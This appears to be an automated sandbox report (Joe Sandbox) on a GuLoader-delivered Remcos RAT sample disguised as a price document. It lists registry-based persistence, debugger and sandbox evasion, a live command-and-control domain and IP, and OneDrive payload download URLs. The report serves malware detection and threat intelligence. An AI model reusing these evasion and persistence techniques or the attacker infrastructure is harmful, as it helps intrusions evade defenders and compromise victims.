            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_00406D74 push 0000007Eh; retf 0016h0_2_00406D76
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02155AE1 push 01D18579h; retf 0_2_02155BDC
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02145AE1 push 01D18579h; retf 12_2_02145BDC
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00565AE1 push 01D18579h; retf 14_2_00565BDC
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F5AE1 push 01D18579h; retf 15_2_021F5BDC
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00565AE1 push 01D18579h; retf 16_2_00565BDC
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeJump to dropped file

            Boot Survival:

            barindex
            Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Brandsson C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.vbsJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Brandsson C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.vbsJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce BrandssonJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce BrandssonJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce BrandssonJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce BrandssonJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Indtastningsfacilitet.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02157802 rdtsc 0_2_02157802
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeWindow / User API: threadDelayed 602Jump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exe TID: 5968Thread sleep count: 602 > 30Jump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exe TID: 5968Thread sleep time: -6020000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeLast function: Thread delayed
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344796615.00000000008A7000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWx
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344866328.00000000008F0000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: Indtastningsfacilitet.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Contains functionality to hide a thread from the debuggerShow sources
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_021508B7 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0215074C0_2_021508B7
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02157802 rdtsc 0_2_02157802
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02154D2A LdrInitializeThunk,0_2_02154D2A
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02152A8A mov eax, dword ptr fs:[00000030h]0_2_02152A8A
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_021520DE mov eax, dword ptr fs:[00000030h]0_2_021520DE
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02153B0D mov eax, dword ptr fs:[00000030h]0_2_02153B0D
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_0215812E mov eax, dword ptr fs:[00000030h]0_2_0215812E
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02156D40 mov eax, dword ptr fs:[00000030h]0_2_02156D40
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeCode function: 0_2_02157391 mov eax, dword ptr fs:[00000030h]0_2_02157391
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02142A8A mov eax, dword ptr fs:[00000030h]12_2_02142A8A
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_021420DE mov eax, dword ptr fs:[00000030h]12_2_021420DE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02143B0D mov eax, dword ptr fs:[00000030h]12_2_02143B0D
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_0214812E mov eax, dword ptr fs:[00000030h]12_2_0214812E
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02146D40 mov eax, dword ptr fs:[00000030h]12_2_02146D40
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 12_2_02147391 mov eax, dword ptr fs:[00000030h]12_2_02147391
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00562A8A mov eax, dword ptr fs:[00000030h]14_2_00562A8A
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_005620DE mov eax, dword ptr fs:[00000030h]14_2_005620DE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00566D40 mov eax, dword ptr fs:[00000030h]14_2_00566D40
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00563B0D mov eax, dword ptr fs:[00000030h]14_2_00563B0D
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_0056812E mov eax, dword ptr fs:[00000030h]14_2_0056812E
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 14_2_00567391 mov eax, dword ptr fs:[00000030h]14_2_00567391
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F2A8A mov eax, dword ptr fs:[00000030h]15_2_021F2A8A
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F20DE mov eax, dword ptr fs:[00000030h]15_2_021F20DE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F3B0D mov eax, dword ptr fs:[00000030h]15_2_021F3B0D
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F812E mov eax, dword ptr fs:[00000030h]15_2_021F812E
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F6D40 mov eax, dword ptr fs:[00000030h]15_2_021F6D40
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 15_2_021F7391 mov eax, dword ptr fs:[00000030h]15_2_021F7391
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00562A8A mov eax, dword ptr fs:[00000030h]16_2_00562A8A
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_005620DE mov eax, dword ptr fs:[00000030h]16_2_005620DE
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00566D40 mov eax, dword ptr fs:[00000030h]16_2_00566D40
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00563B0D mov eax, dword ptr fs:[00000030h]16_2_00563B0D
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_0056812E mov eax, dword ptr fs:[00000030h]16_2_0056812E
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeCode function: 16_2_00567391 mov eax, dword ptr fs:[00000030h]16_2_00567391
            Source: C:\Users\user\Desktop\New Doc 20211401#_our new price.exeProcess created: C:\Users\user\Desktop\New Doc 20211401#_our new price.exe 'C:\Users\user\Desktop\New Doc 20211401#_our new price.exe' Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeProcess created: C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exeJump to behavior
            Source: logs.dat.2.drBinary or memory string: [ Program Manager ]
            Source: New Doc 20211401#_our new price.exe, 00000002.00000003.454251663.000000001E842000.00000004.00000001.sdmpBinary or memory string: |Program Manager|
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Remote Access Functionality:

            barindex
            Detected Remcos RATShow sources
            Source: Indtastningsfacilitet.exe, 0000000E.00000002.344844732.00000000008D5000.00000004.00000020.sdmpString found in binary or memory: Remcos_Mutex_InjSI:,

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsScripting11Registry Run Keys / Startup Folder11Process Injection12Masquerading1OS Credential DumpingSecurity Software Discovery521Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Virtualization/Sandbox Evasion22LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol11Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 342481 Sample: New Doc 20211401#_our new p... Startdate: 21/01/2021 Architecture: WINDOWS Score: 100 36 oluchi.ddns.net 2->36 38 g.msn.com 2->38 64 Multi AV Scanner detection for submitted file 2->64 66 Detected Remcos RAT 2->66 68 Yara detected GuLoader 2->68 70 5 other signatures 2->70 8 New Doc 20211401#_our new price.exe 1 2 2->8         started        11 wscript.exe 2->11         started        13 wscript.exe 2->13         started        signatures3 process4 signatures5 72 Creates autostart registry keys with suspicious values (likely registry only malware) 8->72 74 Tries to detect Any.run 8->74 76 Hides threads from debuggers 8->76 15 New Doc 20211401#_our new price.exe 2 12 8->15         started        20 Indtastningsfacilitet.exe 2 11->20         started        22 Indtastningsfacilitet.exe 2 13->22         started        process6 dnsIp7 52 oluchi.ddns.net 91.193.75.243, 2405, 49726, 49735 DAVID_CRAIGGG Serbia 15->52 54 192.168.2.1 unknown unknown 15->54 56 3 other IPs or domains 15->56 30 C:\Users\user\...\Indtastningsfacilitet.exe, PE32 15->30 dropped 32 C:\Users\user\AppData\Roaming\...\logs.dat, ASCII 15->32 dropped 34 C:\Users\user\...\Indtastningsfacilitet.vbs, ASCII 15->34 dropped 58 Multi AV Scanner detection for dropped file 20->58 60 Tries to detect Any.run 20->60 62 Hides threads from debuggers 20->62 24 Indtastningsfacilitet.exe 7 20->24         started        28 Indtastningsfacilitet.exe 7 22->28         started        file8 signatures9 process10 dnsIp11 40 onedrive.live.com 24->40 42 fkteua.db.files.1drv.com 24->42 44 db-files.fe.1drv.com 24->44 78 Tries to detect Any.run 24->78 80 Hides threads from debuggers 24->80 46 onedrive.live.com 28->46 48 fkteua.db.files.1drv.com 28->48 50 db-files.fe.1drv.com 28->50 signatures12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            New Doc 20211401#_our new price.exe13%ReversingLabsWin32.Trojan.Generic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.exe13%ReversingLabsWin32.Trojan.Generic

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            oluchi.ddns.net1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://crl3.digi0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            oluchi.ddns.net
            		91.193.75.243
            		truetrueunknown
            g.msn.com
            		unknown
            		unknownfalse
              		high
              onedrive.live.com
              		unknown
              		unknownfalse
                		high
                fkteua.db.files.1drv.com
                		unknown
                		unknownfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://fkteua.db.files.1drv.com/Indtastningsfacilitet.exe, 0000000E.00000002.344844732.00000000008D5000.00000004.00000020.sdmpfalse
                    		high
                    https://onedrive.live.com/download?cid=A32AEA2B4355716B&resid=A32AEA2B4355716B%215171&authkey=APwe6-Indtastningsfacilitet.exe, 0000000E.00000002.344844732.00000000008D5000.00000004.00000020.sdmp, Indtastningsfacilitet.exe, 0000000E.00000002.344883069.0000000000909000.00000004.00000020.sdmp, Indtastningsfacilitet.exe, 00000010.00000002.352919337.0000000000560000.00000040.00000001.sdmpfalse
                      		high
                      http://crl3.digiIndtastningsfacilitet.exe, 0000000E.00000002.344883069.0000000000909000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://fkteua.db.files.1drv.com/y4m1K5aXO_hTJZwQ6sRUBeX3MwbIRGCEyLmUsy6a-Tv86ILmUxMJD16_BkowRYABW7oIndtastningsfacilitet.exe, 0000000E.00000002.344844732.00000000008D5000.00000004.00000020.sdmp, Indtastningsfacilitet.exe, 0000000E.00000002.344883069.0000000000909000.00000004.00000020.sdmpfalse
                        		high
                        https://onedrive.live.com/Indtastningsfacilitet.exe, 0000000E.00000002.344796615.00000000008A7000.00000004.00000020.sdmpfalse
                          		high
                          https://fkteua.db.files.1drv.com/y4m7jo0uscLY3JGQOA8WNtz0kE6mECzmykD9EyNeCFL_ih_emej5aweglDZjRx1WKGHIndtastningsfacilitet.exe, 0000000E.00000002.344883069.0000000000909000.00000004.00000020.sdmp, Indtastningsfacilitet.exe, 0000000E.00000002.344866328.00000000008F0000.00000004.00000020.sdmpfalse
                            		high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            91.193.75.243
                            		unknownSerbia
                            		209623DAVID_CRAIGGGtrue

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:31.0.0 Red Diamond
                            Analysis ID:342481
                            Start date:21.01.2021
                            Start time:07:22:53
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 18s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:New Doc 20211401#_our new price.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:31
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@13/3@13/2
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 40.7% (good quality ratio 27.5%)
                            • Quality average: 39.3%
                            • Quality standard deviation: 31.7%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 92.122.145.220, 2.20.84.85, 13.64.90.137, 13.107.42.13, 13.107.42.12, 205.185.216.10, 205.185.216.42, 51.103.5.159, 51.11.168.160, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 52.142.114.176
                            • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, vip1-par02p.wns.notify.trafficmanager.net, l-0004.l-msedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, odc-db-files-geo.onedrive.akadns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, odc-db-files-brs.onedrive.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, odc-db-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing network information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            07:24:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Brandsson C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.vbs
                            07:24:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Brandsson C:\Users\user\AppData\Local\Temp\Strikkebgernes\Indtastningsfacilitet.vbs
                            07:24:14API Interceptor1117x Sleep call for process: New Doc 20211401#_our new price.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

